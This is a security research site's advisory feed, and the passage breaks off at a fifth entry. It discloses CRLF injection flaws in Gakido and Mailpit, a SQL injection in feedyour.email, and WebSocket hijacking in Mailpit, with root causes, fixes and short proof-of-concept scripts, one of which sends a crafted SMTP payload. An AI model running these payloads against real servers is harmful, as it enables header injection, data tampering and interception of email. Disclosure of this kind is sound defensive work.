<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://rosecurify.com/" xml:lang="en">
	<title>Rosecurify - Advisories</title>
	<subtitle>Security research, vulnerability disclosures, and application security insights.</subtitle>
	<link href="https://rosecurify.com/feed/advisories.xml" rel="self"/>
	<link href="https://rosecurify.com/"/>
	<updated>2026-01-26T00:00:00Z</updated>
	<id>https://rosecurify.com</id>
	<author>
		<name>Omar Kurt</name>
		<email>securify@rosecurify.com</email>
	</author>
	
	<entry>
		<title>Gakido - CRLF Injection</title>
		<link href="https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/"/>
		<updated>2026-01-26T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A vulnerability was discovered in Gakido that allowed HTTP header injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;When making HTTP requests with user-controlled header values containing &lt;code&gt;&#92;r&#92;n&lt;/code&gt; (CRLF), &lt;code&gt;&#92;n&lt;/code&gt; (LF), or &lt;code&gt;&#92;x00&lt;/code&gt; (null byte) characters, an attacker could inject arbitrary HTTP headers into the request.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected Code:&lt;/strong&gt;
The vulnerability existed in the header processing logic where user-supplied headers were not sanitized before being sent in HTTP requests.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;File:&lt;/strong&gt; &lt;code&gt;gakido/headers.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Function:&lt;/strong&gt; &lt;code&gt;canonicalize_headers()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;An attacker who can control header values passed to Gakido&#39;s &lt;code&gt;Client.get()&lt;/code&gt;, &lt;code&gt;Client.post()&lt;/code&gt;, or other request methods could:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Inject arbitrary HTTP headers&lt;/strong&gt; - Add malicious headers to requests&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HTTP Response Splitting&lt;/strong&gt; - Potentially manipulate responses in certain proxy configurations&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cache Poisoning&lt;/strong&gt; - Inject headers that could poison intermediate caches&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Session Fixation&lt;/strong&gt; - Inject session-related headers&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bypass Security Controls&lt;/strong&gt; - Inject headers that bypass server-side security checks&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;pre class=&quot;language-python&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; gakido &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Client

&lt;span class=&quot;token comment&quot;&gt;# Before fix: X-Injected header would be sent as a separate header&lt;/span&gt;
c &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Client&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;impersonate&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;chrome_120&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
r &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; c&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;https://httpbin.org/headers&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; headers&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;User-Agent&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test&#92;r&#92;nX-Injected: pwned&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-005-gakido-crlf-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/HappyHackingSpace/gakido/security/advisories/GHSA-gcgx-chcp-hxp9&quot;&gt;GHSA-gcgx-chcp-hxp9&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/HappyHackingSpace/gakido/commit/369c67e67c63da510c8a9ab021e54a92ccf1f788&quot;&gt;Fix Commit (369c67e)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/HappyHackingSpace/gakido/releases/tag/v0.1.1-1bc6019&quot;&gt;Release v0.1.1-1bc6019&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>Mailpit - SMTP CRLF Injection via Regex Bypass</title>
		<link href="https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/"/>
		<updated>2026-01-18T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A CRLF Injection vulnerability exists in Mailpit&#39;s SMTP server. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters (&lt;code&gt;&#92;r&lt;/code&gt;) in email addresses due to insufficient regex validation.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; &amp;lt;= v1.28.2&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; The regex patterns used to validate &lt;code&gt;RCPT TO&lt;/code&gt; and &lt;code&gt;MAIL FROM&lt;/code&gt; addresses fail to exclude &lt;code&gt;&#92;r&lt;/code&gt; and &lt;code&gt;&#92;n&lt;/code&gt; characters. The &lt;code&gt;&#92;v&lt;/code&gt; escape sequence inside a character class only matches Vertical Tab, not CR/LF.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vulnerable Code:&lt;/strong&gt;
The vulnerability exists in &lt;code&gt;internal/smtpd/smtpd.go&lt;/code&gt;:&lt;/p&gt;
&lt;pre class=&quot;language-go&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;rcptToRE &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; regexp&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;MustCompile&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;`(?i)TO: ?&amp;lt;([^&amp;lt;&gt;&#92;v]+)&gt;( |$)(.*)?`&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
mailFromRE &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; regexp&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;MustCompile&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;`(?i)FROM: ?&amp;lt;(|[^&amp;lt;&gt;&#92;v]+)&gt;( |$)(.*)?`&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Network access to SMTP port (default 1025)&lt;/li&gt;
&lt;li&gt;No authentication required&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Inject arbitrary SMTP headers&lt;/li&gt;
&lt;li&gt;Corrupt email metadata and &lt;code&gt;Received&lt;/code&gt; headers&lt;/li&gt;
&lt;li&gt;Generate malformed &lt;code&gt;.eml&lt;/code&gt; files&lt;/li&gt;
&lt;li&gt;Violate RFC 5321 compliance&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;pre class=&quot;language-python&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; socket

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    s &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; socket&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;socket&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;socket&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;AF_INET&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; socket&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;SOCK_STREAM&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;connect&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;127.0.0.1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1025&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;recv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;send&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;b&quot;EHLO test.com&#92;r&#92;n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;recv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;send&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;b&quot;MAIL FROM:&amp;lt;attacker@evil.com&gt;&#92;r&#92;n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;recv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;# Injecting &#92;r&lt;/span&gt;
    payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;b&quot;RCPT TO:&amp;lt;victim&#92;rX-Injected: Yes&gt;&#92;r&#92;n&quot;&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;send&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    resp &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;recv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Server Response: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;resp&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;decode&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;  &lt;span class=&quot;token comment&quot;&gt;# Expect 250 OK&lt;/span&gt;
    s&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;close&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

exploit&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to Mailpit version 1.28.3 or later.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-004-mailpit-smtp-crlf-injection-via-regex-bypass/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c&quot;&gt;GitHub Security Advisory GHSA-54wq-72mp-cq7c&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cwe.mitre.org/data/definitions/93.html&quot;&gt;CWE-93: CRLF Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cwe.mitre.org/data/definitions/150.html&quot;&gt;CWE-150: Improper Neutralization of Escape Sequences&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>feedyour.email - SQL Injection via Search Parameter</title>
		<link href="https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/"/>
		<updated>2026-01-13T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A SQL Injection vulnerability exists in feedyour.email. The vulnerability allows remote attackers to execute arbitrary SQL commands via the search functionality.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; &amp;lt;=2.4.1&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; The search parameter (&lt;code&gt;params[:q]&lt;/code&gt;) is passed directly to the SQLite &lt;code&gt;search()&lt;/code&gt; function without proper sanitization, allowing attackers to inject malicious SQL commands.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vulnerable Code:&lt;/strong&gt;
The vulnerability exists in &lt;code&gt;app/controllers/posts_controller.rb&lt;/code&gt; where user input is directly passed to the search function:&lt;/p&gt;
&lt;pre class=&quot;language-ruby&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-ruby&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;@posts&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;@posts&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;search&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;params&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token symbol&quot;&gt;:q&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;to_a&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required.&lt;/li&gt;
&lt;li&gt;Attacker must have access to the search functionality.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Extract sensitive data from the database.&lt;/li&gt;
&lt;li&gt;Modify or delete database contents.&lt;/li&gt;
&lt;li&gt;Bypass authentication mechanisms.&lt;/li&gt;
&lt;li&gt;Potentially achieve remote code execution depending on database configuration.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Using sqlmap, the search parameter was confirmed vulnerable to SQL injection attacks. Boolean-based blind and UNION-based injections were successfully demonstrated.&lt;/p&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to a patched version of feedyour.email that includes proper input sanitization using character whitelisting.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-003-feedyour-email-sql-injection-via-search-parameter/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/indirect/feedyour.email/pull/732&quot;&gt;GitHub Pull Request #732&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/indirect/feedyour.email/commit/da20b2fad5068b99e1c843bae176b38ebede48d1&quot;&gt;Fix Commit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>Mailpit - Cross-Site WebSocket Hijacking (CSWSH)</title>
		<link href="https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/"/>
		<updated>2026-01-10T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A Cross-Site WebSocket Hijacking (CSWSH) vulnerability exists in Mailpit. The vulnerability allows remote attackers to intercept sensitive data such as email contents, headers, and server statistics in real-time.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; &amp;lt;=1.28.1&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; The Mailpit WebSocket server is configured to accept connections from any origin. This lack of Origin header validation allows attackers to hijack WebSocket connections.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vulnerable Code:&lt;/strong&gt;
The vulnerability exists in &lt;code&gt;server/websockets/client.go&lt;/code&gt; where the &lt;code&gt;CheckOrigin&lt;/code&gt; function is explicitly set to return &lt;code&gt;true&lt;/code&gt; for all requests, bypassing standard Same-Origin Policy (SOP) protections provided by the gorilla/websocket library.&lt;/p&gt;
&lt;pre class=&quot;language-go&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; upgrader &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; websocket&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Upgrader&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    ReadBufferSize&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    WriteBufferSize&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1024&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    CheckOrigin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Request&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;bool&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    EnableCompression&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required.&lt;/li&gt;
&lt;li&gt;Victim must visit a malicious website while running Mailpit locally.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Intercept sensitive email data (subjects, bodies, recipients).&lt;/li&gt;
&lt;li&gt;Access server statistics.&lt;/li&gt;
&lt;li&gt;Receive real-time notifications of new emails.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;An attacker can host a malicious website that establishes a WebSocket connection to the victim&#39;s Mailpit instance (e.g., &lt;code&gt;ws://localhost:8025/api/events&lt;/code&gt;). Since the origin check is disabled, the browser allows this cross-origin connection, leaking all broadcasted events to the attacker.&lt;/p&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to the latest version of Mailpit (1.21.1 or later) which implements proper Origin validation or removes the unsafe check to allow the library&#39;s default protection.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-002-mailpit-cross-site-websocket-hijacking-cswsh/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/axllent/mailpit/security/advisories/GHSA-524m-q5m7-79mm&quot;&gt;GHSA-524m-q5m7-79mm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>Mailpit - Server-Side Request Forgery (SSRF)</title>
		<link href="https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/"/>
